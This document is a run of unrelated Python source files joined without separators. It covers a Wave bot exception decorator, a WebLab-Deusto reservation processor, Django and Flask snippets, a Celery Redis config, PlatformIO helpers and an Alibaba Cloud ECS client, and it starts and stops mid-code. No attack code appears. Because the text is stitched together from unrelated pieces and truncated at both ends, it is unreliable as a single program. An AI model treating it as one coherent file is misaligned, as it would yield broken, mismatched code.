as eCodes import output as eOutput import rayExceptions from waveto import waveRpc from waveapi import simplejson from google.appengine.runtime import DeadlineExceededError class interceptExceptions(object): ''' Decorator to process exceptions that can be recovered from. If an exception is raised the appropriate page or error code is returned to the user @param function: the function to call @return the function to return @condition: the first arg must be the webapp.RequestHandler instance ''' def __init__(self, render_page): ''' @param render_page: set to true if this method is rendering a page, false if it is answering an ajax call ''' self.render_page = render_page def __call__(self, function): def decorated_function(*args, **kwargs): handler = args[0] try: return function(*args, **kwargs) except DeadlineExceededError: logging.warn("Deadline Exceeded for request") if self.render_page: return eOutput.DeadlineExceeded(handler).RenderPage(eCodes.REQUEST_DEADLINE_ERR) else: return eOutput.DeadlineExceeded(handler).ReturnResponse() except waveRpc.DownloadException: logging.warn("Could not download wave from google servers") if self.render_page: return eOutput.WaveRpcDownloadProblem(handler).RenderPage(eCodes.CANNOT_CONNECT_TO_WAVE_ERR) else: return eOutput.WaveRpcDownloadProblem(handler).ReturnResponse() except waveRpc.NotParticipantException: logging.warn("Mr-Ray not participant of wave") if self.render_page: return eOutput.RayNotWaveParticipant(handler).RenderPage(eCodes.BOT_NOT_PARTICIPANT_ERR) else: return eOutput.RayNotWaveParticipant(handler).ReturnResponse() except simplejson.decoder.JSONDecodeError: logging.warn("Could not decode incoming json") return eOutput.JsonDecodingProblem(handler).ReturnResponse() except rayExceptions.MalformedRequest: logging.warn("The request was malformed in some way") return eOutput.MalformedRequest(handler).ReturnResponse() except Exception, ex: logging.exception("Unknown error") if self.render_page: return eOutput.UnknownProblem(handler).RenderPage(eCodes.UNKNOWN_ERR) else: return eOutput.UnknownProblem(handler).ReturnResponse() return decorated_functionzstars/weblabdeusto #!/usr/bin/env python #-*-*- encoding: utf-8 -*-*- # # Copyright (C) 2005 onwards University of Deusto # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. 
# # This software consists of contributions made by many individuals, # listed below: # # Author: <> # <> # import random import time as time_module import voodoo.log as log import weblab.configuration_doc as configuration_doc import weblab.data.server_type as ServerType import weblab.data.command as Command import weblab.core.exc as core_exc import weblab.core.reservations as Reservation from weblab.core.file_storer import FileStorer import weblab.core.coordinator.exc as coord_exc import weblab.core.coordinator.status as scheduling_status import weblab.core.coordinator.store as TemporalInformationStore import weblab.lab.exc as LaboratoryErrors DEFAULT_EXPERIMENT_POLL_TIME = 350 # seconds EXPERIMENT_POLL_TIME = 'core_experiment_poll_time' class ReservationProcessor(object): """ This class encapsulates the methods of the user dependent on the interaction with the experiment. This is a middle step before moving this class to the proxy server. Previously, all these methods were implemented in the UserProcessor class, but all methods here only rely on the reservation_id (instead of relying on the session_id). The difference is that it will be possible to handle more than one concurrent reservation with the same session (which is desirable when using calendars), and it will be possible to provide a reservation_id (that can interact with the experiment) without compromising the rest of the session. """ EXPIRATION_TIME_NOT_SET=-1234 def __init__(self, cfg_manager, reservation_id, reservation_session, coordinator, locator, commands_store): self._cfg_manager = cfg_manager self._reservation_session_id = reservation_id self._reservation_id = reservation_id.id self._reservation_session = reservation_session self._coordinator = coordinator self._locator = locator self._commands_store = commands_store self.time_module = time_module # The response to asynchronous commands is not immediately available, so we need to # use this map to store the ids of the usage objects (commands sent), identified through # their request_ids (which are not the same). As their responses become available, we will # use the request_ids to find the ids of the usage objects, and update them. # # It seems that the UserProcessor is re-created rather often, so we cannot store # usage-related information locally. We will store it in the session object instead. # TODO: As of now, if the async_commands_ids is not in session we will initialize it. # Probably that initialization should be moved to wherever session is initialized. if not "async_commands_ids" in self._reservation_session: self._reservation_session["async_commands_ids"] = {} def get_session(self): return self._reservation_session def get_reservation_session_id(self): return self._reservation_session_id def get_reservation_id(self): return self._reservation_id def get_info(self): return self._reservation_session['experiment_id'] ############################################################################## # # # STATUS MANAGEMENT # # def get_status(self): """ get_status() -> Reservation It returns the state of the reservation (such as "you're waiting in a queue", "the experiment is being initialized", "you have the reservation available", etc.) 
""" try: status = self._coordinator.get_reservation_status( self._reservation_id ) except coord_exc.ExpiredSessionError as e: log.log(ReservationProcessor, log.level.Debug, "reason for rejecting:") log.log_exc(ReservationProcessor, log.level.Debug) human = self._cfg_manager.get_doc_value(configuration_doc.CORE_UNIVERSAL_IDENTIFIER_HUMAN) core_id = self._cfg_manager.get_doc_value(configuration_doc.CORE_UNIVERSAL_IDENTIFIER) raise core_exc.NoCurrentReservationError("get_reservation_status at %s (%s) called but coordinator rejected reservation id (%s). Reason: %s" % (human, core_id, self._reservation_id, str(e))) else: if status.status == scheduling_status.WebLabSchedulingStatus.RESERVED_LOCAL: self.process_reserved_status(status) if status.status == scheduling_status.WebLabSchedulingStatus.RESERVED_REMOTE: self.process_reserved_remote_status(status) return Reservation.Reservation.translate_reservation( status ) def process_reserved_status(self, status): if 'lab_session_id' in self._reservation_session: return # Already called in the past self._reservation_session['lab_session_id'] = status.lab_session_id self._reservation_session['lab_coordaddr'] = status.coord_address if status.exp_info.get('manages_polling', False): self.disable_polling() # TODO: it should not be time_module.time, but retrieve this information # from the status manager to know when it started self._renew_expiration_time( self.time_module.time() + status.time ) def process_reserved_remote_status(self, status): self._reservation_session['federated'] = True def disable_polling(self): self._reservation_session['manages_polling'] = True def finish(self): """ Called when the experiment ends, regardless of the way. (That is, it does not matter whether the user finished it explicitly or not). """ # If already finished, exit if not self.is_polling(): return self._stop_polling() self._reservation_session.pop('lab_session_id', None) try: self._coordinator.finish_reservation(self._reservation_id) except Exception as e: log.log( ReservationProcessor, log.level.Error, "Exception finishing reservation: %s" % e ) log.log_exc( ReservationProcessor, log.level.Warning ) raise core_exc.FailedToFreeReservationError( "There was an error freeing reservation: %s" % e) def update_latest_timestamp(self): """ Used in weblab.admin.monitor to check the status of current users """ self._reservation_session['latest_timestamp'] = self._utc_timestamp() ############################################################################## # # # POLLING MANAGEMENT # # # Whenever the experiment finishes, the server notifies the Reservation # Processor. Polling is therefore only required to kick those users that # are not using the experiment for a long time. # # The variable is created when the reservation is created. It is removed # when the experiment finishes. # # TODO: the reservation system should tell the processor whether this # experiments expects polling or not. # def is_polling(self): """ Is this user in a queue or using an experiment, and therefore it should be continuosly informing that it is alive? Otherwise, weblab will kick him. 
""" return 'session_polling' in self._reservation_session def is_federated(self): return self._reservation_session.get('federated', False) def manages_polling(self): return self._reservation_session.get('manages_polling', False) def _renew_expiration_time(self, expiration_time): if self.is_polling(): self._reservation_session['session_polling'] = ( self.time_module.time(), expiration_time ) def poll(self): """Inform that it is still online and interested on the reservation""" if not self.is_polling(): raise core_exc.NoCurrentReservationError("poll called but no current reservation") latest_poll, expiration_time = self._reservation_session['session_polling'] self._reservation_session['session_polling'] = ( self.time_module.time(), expiration_time ) def is_expired(self): """Did this reservation's user stay out for a long time without polling?""" # If it has been assigned to a laboratory that explicitly requests to avoid # using polling, then it is only expired when the particular laboratory # states that it is expired. if self.manages_polling(): return False # If it has been assigned in a foreign server, then, it is never expired if self.is_federated(): return False # If it is not polling, it was expired in the past if not self.is_polling(): return True # # But if it polling and it hasn't polled in some time # current_time = self.time_module.time() latest_poll, expiration_time = self._reservation_session['session_polling'] if current_time - latest_poll > self._cfg_manager.get_value(EXPERIMENT_POLL_TIME, DEFAULT_EXPERIMENT_POLL_TIME): return True elif expiration_time != ReservationProcessor.EXPIRATION_TIME_NOT_SET and current_time > expiration_time: return True return False def _stop_polling(self): if self.is_polling(): self._reservation_session.pop('session_polling') ############################################################################## # # # SENDING COMMANDS AND FILES # ######################### # # Communications # def send_file(self, file_content, file_info ): # # Check that the reservation is enabled # lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise core_exc.NoCurrentReservationError("send_file called but the reservation was not enabled") # # Retrieve the laboratory server # usage_file_sent = self._store_file(file_content, file_info) command_id_pack = self._append_file(usage_file_sent) try: laboratory_server = self._locator[lab_coordaddr] response = laboratory_server.send_file( lab_session_id, file_content, file_info ) self._update_command_or_file(command_id_pack, response) return response except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: self._update_command_or_file(command_id_pack, Command.Command("ERROR: SessionNotFound")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftie: self._update_command_or_file(command_id_pack, Command.Command("ERROR: " + str(ftie))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send: %s" % ftie ) def send_command(self, command): # # Check the that the experiment is enabled # lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise 
core_exc.NoCurrentReservationError("send_command called but the reservation is not enabled") command_id_pack = self._append_command(command) try: laboratory_server = self._locator[lab_coordaddr] # We call the laboratory server's send_command, which will finally # get the command to be handled by the experiment. response = laboratory_server.send_command( lab_session_id, command ) # The previous call was executed synchronously and we have # received the response. Before returning it, we will store it # locally so that we can log it. self._update_command_or_file(command_id_pack, response) return response except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: self._update_command_or_file(command_id_pack, Command.Command("ERROR: SessionNotFound: None")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftspe: self._update_command_or_file(command_id_pack, Command.Command("ERROR: " + str(ftspe))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send command: %s" % ftspe ) def send_async_file(self, file_content, file_info ): """ Sends a file asynchronously. Status of the request may be checked through check_async_command_status. @param file_content: Content of the file being sent @param file_info: File information of the file being sent @see check_async_command_status """ lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise core_exc.NoCurrentReservationError("send_async_file called but no current reservation") usage_file_sent = self._store_file(file_content, file_info) command_id_pack = self._append_file(usage_file_sent) try: laboratory_server = self._locator[lab_coordaddr] response = laboratory_server.send_async_file( lab_session_id, file_content, file_info ) # TODO: how do we store async files? whenever somebody ask for the status? what if they don't ask for it? return response except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: self._update_command_or_file(command_id_pack, Command.Command("ERROR: SessionNotFound: None")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftspe: self._update_command_or_file(command_id_pack, Command.Command("ERROR: " + str(ftspe))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send file: %s" % ftspe ) def check_async_command_status(self, request_identifiers): """ Checks the status of several asynchronous commands. The request will be internally forwarded to the lab server. Standard async commands and file_send commands are treated in the same way. Commands reported as finished (either successfully or not) will be removed, so check_async_command_status should not be called on them again. Before removing the commands, it will also register their response for logging purposes. 
@param request_identifiers: List of the identifiers to check @return: Dictionary by request-id of tuples: (status, content) """ lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise core_exc.NoCurrentReservationError("check_async_command called but no current reservation") try: laboratory_server = self._locator[lab_coordaddr] response = laboratory_server.check_async_command_status( lab_session_id, request_identifiers) # Within the response map, we might now have the real response to one # (or more) async commands. We will update the usage object of the # command with its response, so that once the experiment ends it appears # in the log as expected. for req_id, (cmd_status, cmd_response) in response.items(): #@UnusedVariable if(req_id in self._reservation_session["async_commands_ids"]): #usage_obj_id = self._reservation_session["async_commands_ids"][req_id] # TODO: Bug here. async_commands_ids is empty. # self._update_command_or_file(usage_obj_id, cmd_response) pass return response except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: # We did not find the specified session in the laboratory server. # We'll finish the experiment. #self._update_command(command_id_pack, Command.Command("ERROR: SessionNotFound: None")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftspe: # There was an error while trying to send the command. # We'll finish the experiment. #self._update_command(command_id_pack, Command.Command("ERROR: " + str(ftspe))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send command: %s" % ftspe ) def send_async_command(self, command): """ Runs a command asynchronously. Status of the request may be checked through the check_async_command_status method. @param command The command to run @see check_async_command_status """ lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise core_exc.NoCurrentReservationError("send_async_command called but no current reservation") command_id_pack = self._append_command(command) try: laboratory_server = self._locator[lab_coordaddr] # We forward the request to the laboratory server, which # will forward it to the actual experiment. Because this is # an asynchronous call, we will not receive the actual response # to the command, but simply an ID identifying our request. This also # means that by the time this call returns, the real response to the # command is most likely not available yet. request_id = laboratory_server.send_async_command(lab_session_id, command) # If this was a standard, synchronous send_command, we would now store the response # we received, so that later, when the experiment finishes, the log is properly # written. However, the real response is not available yet, so we can't do that here. # Instead, we will store a reference to our usage object, so that we can later update it # when the response to the asynchronous command is ready. self._reservation_session["async_commands_ids"][request_id] = command_id_pack # TODO: when do we store async commands? whenever user asks for status? what if they don't ever ask? 
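# In other words, check_async_command_status() is expected to look up
# self._reservation_session["async_commands_ids"][request_id] to recover this
# command_id_pack and pass the real response to _update_command_or_file() once it
# arrives (that update is currently still commented out there as a known TODO),
# so the usage log can eventually reflect what the experiment answered.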
return request_id except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: self._update_command_or_file(command_id_pack, Command.Command("ERROR: SessionNotFound: None")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftspe: self._update_command_or_file(command_id_pack, Command.Command("ERROR: " + str(ftspe))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send command: %s" % ftspe ) ############################################################################## # # # SENDING COMMANDS AND FILES # ######################### # # Storage. # No reference to session, only to _reservation_id # def _append_command(self, command): return self._append_command_or_file(command, True) def _append_file(self, command): return self._append_command_or_file(command, False) def _append_command_or_file(self, command, command_or_file): command_id = random.randint(0, 1000 * 1000 * 1000) timestamp = self._utc_timestamp() command_entry = TemporalInformationStore.CommandOrFileInformationEntry(self._reservation_id, True, command_or_file, command_id, command, timestamp) self._commands_store.put(command_entry) return command_id, command_or_file def _update_command_or_file(self, (command_id, command_or_file), response): timestamp = self._utc_timestamp() command_entry = TemporalInformationStore.CommandOrFileInformationEntry(self._reservation_id, False, command_or_file, command_id, response, timestamp) self._commands_store.put(command_entry) def _utc_timestamp(self): return self.time_module.time() def _store_file(self, file_content, file_info): storer = FileStorer(self._cfg_manager, self._reservation_id, self.time_module) return storer.store_file(file_content, file_info) #!/usr/bin/env python3 # coding: utf-8 from zencad import * m = circle(10) + square(17, center=True) m0 = m m1 = unify(m) m2 = m.extrude(10) m3 = unify(m).extrude(10) display(m0) display(m1.right(30)) display(m2.forw(30)) display(m3.right(30).forw(30)) show() 0 #!/usr/bin/env python3 import os import sys from filter_terms import * def main(args): global special_domains file_prefix = args[1] web_score_dict_file = args[2] if args[3].lower() in ['true','t']: use_web_score = True elif args[3].lower() in ['false','f']: use_web_score = False else: print('You set the webscore flag to', args[3], 'but it must be either "True" or "False".') print('Use "True" if you want the system to use the webscore function and the system will run slowly and be more accurate.') print('Use "False" otherwise.') max_term_number = int(args[4]) abbr_file_list = args[5] if (len(args)>6) and (args[6].lower() != 'false'): special_domains.extend(args[6].split('+')) initialize_utilities() input_file = file_prefix + ".all_terms" output_file = file_prefix + ".scored_output" abbr_full_file = file_prefix + ".dict_abbr_to_full" full_abbr_file = file_prefix + ".dict_full_to_abbr" reject_file = file_prefix + ".rejected-terms" filter_terms(input_file,output_file,abbr_full_file,full_abbr_file,use_web_score=use_web_score,numeric_cutoff=max_term_number,reject_file=reject_file,web_score_dict_file=web_score_dict_file,abbr_files=abbr_file_list) if __name__ == '__main__': sys.exit(main(sys.argv)) # coding: utf-8 try: from django.conf.urls.defaults import url except ImportError: from django.conf.urls import url from . 
import views as v urlpatterns = [ url(r'^result/$', v.receive_result, name='robokassa_result'), url(r'^success/$', v.success, name='robokassa_success'), url(r'^fail/$', v.fail, name='robokassa_fail'), ] #encoding:utf-8 subreddit = 'getmotivated' t_channel = '@r_getmotivated' def send_post(submission, r2t): return r2t.send_simple(submission) from mk2.plugins import Plugin from mk2.events import Hook class Save(Plugin): warn_message = Plugin.Property(default="WARNING: saving map in {delay}.") message = Plugin.Property(default="MAP IS SAVING.") warn_command = Plugin.Property(default="say %s") save_command = Plugin.Property(default="save-all") save_off_command = Plugin.Property(default="save-off") save_on_command = Plugin.Property(default="save-on") save_allowed = True def setup(self): self.register(self.save, Hook, public=True, name='save', doc='save the map') self.register(self.save_off, Hook, public=True, name='save-plugin-off', doc='Disable save plugin.') self.register(self.save_on, Hook, public=True, name='save-plugin-on', doc='Enable save plugin.') def warn(self, delay): self.send_format(self.warn_command % self.warn_message, delay=delay) def save(self, event): if (self.save_allowed): action = self.save_real if event.args: warn_length, action = self.action_chain(event.args, self.warn, action) action() event.handled = True def save_real(self): if self.message: self.send(self.warn_command % self.message) self.send(self.save_command) def save_off(self, event): self.save_allowed = False self.send(self.save_off_command) event.handled = True def save_on(self, event): self.save_allowed = True self.send(self.save_on_command) event.handled = True lsybzb/meiduomeiduo_mall/celery_tasks/config.py broker_url = "redis://:meiduo@127.0.0.1/14"app.py1-10 from flask import Flask, render_template, request, redirect, url_for,session import pandas as pd import numpy as np import pickle from werkzeug.utils import secure_filename import os from flask import jsonify #prep data def prep_data(df): cat_df = pd.get_dummies(df[['OverTime']], drop_first=True) num_df = df[['Age','HourlyRate','DailyRate','MonthlyIncome','TotalWorkingYears','YearsAtCompany','NumCompaniesWorked','DistanceFromHome']] new_df = pd.concat([num_df,cat_df], axis=1) return new_df # def allowed_file(filename): return '.' 
in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS UPLOAD_FOLDER = './templates' ALLOWED_EXTENSIONS = set(['csv']) ## Initialize the app app = Flask(__name__) app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER @app.route('/home') def analysis_page(): # render a static template return render_template('home.html') @app.route('/') def index(): # redirect to home return redirect(url_for('analysis_page')) @app.route('/prediction', methods=['GET','POST']) def prediction_page(): if request.method == 'POST': #check if post request has the file type if 'file' not in request.files: return render_template('home.html', error='No File part',retJson ='No file part') file = request.files['file'] # if user the did not select file if file.filename == '': return render_template ('home.html',error='No file Selected', retJson='No File Selected') #check for allowed extension if file and allowed_file(file.filename): filename = secure_filename(file.filename) file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) # load the model from disk loaded_model = pickle.load(open('./random_forest_hr_model.sav', 'rb')) # read csv data = pd.read_csv(filename) prediction = loaded_model.predict_proba(prep_data(data)) # get percentage proba retJson = [] count = 0 for prob in prediction: count+=1 retJson.append("The probability of Employee Attrition with index {} : {} % ".format(count,prob[0] * 100)) #retJson =jsonify({'retJson' :retJson}) return render_template('home.html',error=None, retJson= retJson ) # render a static template return render_template('home.html') @app.route('/attrition', methods=['GET','POST']) def single_prediction_page(): if request.method == 'POST': Age = request.form['Age'] HourlyRate = request.form['HourlyRate'] OverTime = request.form['OverTime'] DailyRate = request.form['DailyRate'] MonthlyIncome = request.form['MonthlyIncome'] TotalWorkingYears = request.form['TotalWorkingYears'] YearsAtCompany = request.form['YearsAtCompany'] NumCompaniesWorked = request.form['NumCompaniesWorked'] DistanceFromHome = request.form['DistanceFromHome'] if len(Age) <= 0 or len(HourlyRate) <= 0 or len(OverTime) <= 0 or len(DailyRate) <= 0 or len(MonthlyIncome)<= 0 or len(TotalWorkingYears) <= 0 or len(YearsAtCompany) <= 0 or len(NumCompaniesWorked) <= 0: return render_template('home.html', retJson= 'All filed is required to make prediction' ) if OverTime == 'Yes': OverTime_Yes = 1 else: OverTime_Yes = 0 #create a pandas dataframe df = pd.DataFrame([{'Age': Age, 'HourlyRate': HourlyRate,'DailyRate':DailyRate, 'MonthlyIncome': MonthlyIncome, 'TotalWorkingYears':TotalWorkingYears, 'YearsAtCompany': YearsAtCompany, 'NumCompaniesWorked':NumCompaniesWorked, 'DistanceFromHome':DistanceFromHome, 'OverTime_Yes': OverTime_Yes}]) loaded_model = pickle.load(open('./random_forest_hr_model.sav', 'rb')) #print(df.head()) #temp = [ Age, HourlyRate, DailyRate, MonthlyIncome,TotalWorkingYears, YearsAtCompany, NumCompaniesWorked,DistanceFromHome, OverTime_Yes] #temp = np.reshape(1,-1) prediction = loaded_model.predict_proba(df) retJson = [] for prob in prediction: retJson.append("The probability is : {} % ".format(prob[0] * 100)) return render_template('prob.html',error=None, retJson= retJson ) # render a static template return render_template('home.html') if __name__ =='__main__': app.run(debug=True) # Copyright (c) 2014-present PlatformIO <> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import os from hashlib import sha1 from os import walk from os.path import (basename, dirname, expanduser, isdir, isfile, join, realpath, splitdrive) from click.testing import CliRunner from platformio import __version__, exception from platformio.compat import WINDOWS, hashlib_encode_data from platformio.project.config import ProjectConfig def get_project_dir(): return os.getcwd() def is_platformio_project(project_dir=None): if not project_dir: project_dir = get_project_dir() return isfile(join(project_dir, "platformio.ini")) def find_project_dir_above(path): if isfile(path): path = dirname(path) if is_platformio_project(path): return path if isdir(dirname(path)): return find_project_dir_above(dirname(path)) return None def get_project_optional_dir(name, default=None): project_dir = get_project_dir() config = ProjectConfig.get_instance(join(project_dir, "platformio.ini")) optional_dir = config.get("platformio", name) if not optional_dir: return default if "$PROJECT_HASH" in optional_dir: optional_dir = optional_dir.replace( "$PROJECT_HASH", "%s-%s" % (basename(project_dir), sha1( hashlib_encode_data(project_dir)).hexdigest()[:10])) if optional_dir.startswith("~"): optional_dir = expanduser(optional_dir) return realpath(optional_dir) def get_project_core_dir(): default = join(expanduser("~"), ".platformio") core_dir = get_project_optional_dir( "core_dir", get_project_optional_dir("home_dir", default)) win_core_dir = None if WINDOWS and core_dir == default: win_core_dir = splitdrive(core_dir)[0] + "\\.platformio" if isdir(win_core_dir): core_dir = win_core_dir if not isdir(core_dir): try: os.makedirs(core_dir) except OSError as e: if win_core_dir: os.makedirs(win_core_dir) core_dir = win_core_dir else: raise e assert isdir(core_dir) return core_dir def get_project_global_lib_dir(): return get_project_optional_dir("globallib_dir", join(get_project_core_dir(), "lib")) def get_project_platforms_dir(): return get_project_optional_dir("platforms_dir", join(get_project_core_dir(), "platforms")) def get_project_packages_dir(): return get_project_optional_dir("packages_dir", join(get_project_core_dir(), "packages")) def get_project_cache_dir(): return get_project_optional_dir("cache_dir", join(get_project_core_dir(), ".cache")) def get_project_workspace_dir(): return get_project_optional_dir("workspace_dir", join(get_project_dir(), ".pio")) def get_project_build_dir(force=False): path = get_project_optional_dir("build_dir", join(get_project_workspace_dir(), "build")) try: if not isdir(path): os.makedirs(path) except Exception as e: # pylint: disable=broad-except if not force: raise Exception(e) return path def get_project_libdeps_dir(): return get_project_optional_dir( "libdeps_dir", join(get_project_workspace_dir(), "libdeps")) def get_project_lib_dir(): return get_project_optional_dir("lib_dir", join(get_project_dir(), "lib")) def get_project_include_dir(): return get_project_optional_dir("include_dir", join(get_project_dir(), "include")) def get_project_src_dir(): return get_project_optional_dir("src_dir", join(get_project_dir(), "src")) def get_project_test_dir(): return 
get_project_optional_dir("test_dir", join(get_project_dir(), "test")) def get_project_boards_dir(): return get_project_optional_dir("boards_dir", join(get_project_dir(), "boards")) def get_project_data_dir(): return get_project_optional_dir("data_dir", join(get_project_dir(), "data")) def get_project_shared_dir(): return get_project_optional_dir("shared_dir", join(get_project_dir(), "shared")) def compute_project_checksum(config): # rebuild when PIO Core version changes checksum = sha1(hashlib_encode_data(__version__)) # configuration file state checksum.update(hashlib_encode_data(config.to_json())) # project file structure check_suffixes = (".c", ".cc", ".cpp", ".h", ".hpp", ".s", ".S") for d in (get_project_include_dir(), get_project_src_dir(), get_project_lib_dir()): if not isdir(d): continue chunks = [] for root, _, files in walk(d): for f in files: path = join(root, f) if path.endswith(check_suffixes): chunks.append(path) if not chunks: continue chunks_to_str = ",".join(sorted(chunks)) if WINDOWS: # case insensitive OS chunks_to_str = chunks_to_str.lower() checksum.update(hashlib_encode_data(chunks_to_str)) return checksum.hexdigest() def load_project_ide_data(project_dir, env_name): from platformio.commands.run import cli as cmd_run result = CliRunner().invoke(cmd_run, [ "--project-dir", project_dir, "--environment", env_name, "--target", "idedata" ]) if result.exit_code != 0 and not isinstance(result.exception, exception.ReturnErrorCode): raise result.exception if '"includes":' not in result.output: raise exception.PlatformioException(result.output) for line in result.output.split("\n"): line = line.strip() if line.startswith('{"') and line.endswith("}"): return json.loads(line) return None 10-100 # Copyright 2019 Alibaba Cloud Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
from alibabacloud.client import AlibabaCloudClient from alibabacloud.request import APIRequest from alibabacloud.utils.parameter_validation import verify_params class EcsClient(AlibabaCloudClient): def __init__(self, client_config, credentials_provider=None, retry_policy=None, endpoint_resolver=None): AlibabaCloudClient.__init__(self, client_config, credentials_provider=credentials_provider, retry_policy=retry_policy, endpoint_resolver=endpoint_resolver) self.product_code = 'Ecs' self.api_version = '2014-05-26' self.location_service_code = 'ecs' self.location_endpoint_type = 'openAPI' def delete_instances( self, resource_owner_id=None, list_of_instance_id=None, dry_run=None, resource_owner_account=None, client_token=None, owner_account=None, terminate_subscription=None, force=None, owner_id=None): api_request = APIRequest('DeleteInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": list_of_instance_id, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "TerminateSubscription": terminate_subscription, "Force": force, "OwnerId": owner_id} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_storage_set_attribute( self, resource_owner_id=None, client_token=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, storage_set_id=None, storage_set_name=None): api_request = APIRequest('ModifyStorageSetAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "StorageSetId": storage_set_id, "StorageSetName": storage_set_name} return self._handle_request(api_request).result def describe_storage_sets( self, resource_owner_id=None, client_token=None, storage_set_ids=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, zone_id=None, storage_set_name=None): api_request = APIRequest('DescribeStorageSets', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "StorageSetIds": storage_set_ids, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ZoneId": zone_id, "StorageSetName": storage_set_name} return self._handle_request(api_request).result def describe_storage_set_details( self, resource_owner_id=None, client_token=None, page_number=None, region_id=None, page_size=None, storage_set_partition_number=None, disk_ids=None, resource_owner_account=None, owner_account=None, owner_id=None, storage_set_id=None): api_request = APIRequest('DescribeStorageSetDetails', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "StorageSetPartitionNumber": storage_set_partition_number, "DiskIds": disk_ids, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "StorageSetId": storage_set_id} return self._handle_request(api_request).result def 
delete_storage_set( self, resource_owner_id=None, client_token=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, storage_set_id=None): api_request = APIRequest('DeleteStorageSet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "StorageSetId": storage_set_id} return self._handle_request(api_request).result def create_storage_set( self, resource_owner_id=None, client_token=None, max_partition_number=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, zone_id=None, storage_set_name=None): api_request = APIRequest('CreateStorageSet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "MaxPartitionNumber": max_partition_number, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ZoneId": zone_id, "StorageSetName": storage_set_name} return self._handle_request(api_request).result def modify_disk_spec( self, resource_owner_id=None, disk_id=None, resource_owner_account=None, performance_level=None, owner_account=None, owner_id=None): api_request = APIRequest('ModifyDiskSpec', 'GET', 'http', 